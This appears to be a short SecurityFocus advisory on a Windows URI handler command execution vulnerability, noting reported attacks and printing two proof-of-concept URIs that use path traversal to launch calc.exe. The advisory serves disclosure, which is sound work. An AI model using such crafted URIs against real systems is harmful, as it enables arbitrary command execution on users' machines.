Microsoft Windows URI Handler Command Execution Vulnerability

UPDATE (October 25, 2007): Microsoft states in an updated version of security advisory 943521 that the vendor is aware of attacks that try to exploit this issue.

The following proof-of-concept URI demonstrates this vulnerability:

http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
mailto:test% ../../../../windows/system32/calc.exe".cmd

The following proof-of-concept PDF file is available:


 

Privacy Statement
Copyright 2010, SecurityFocus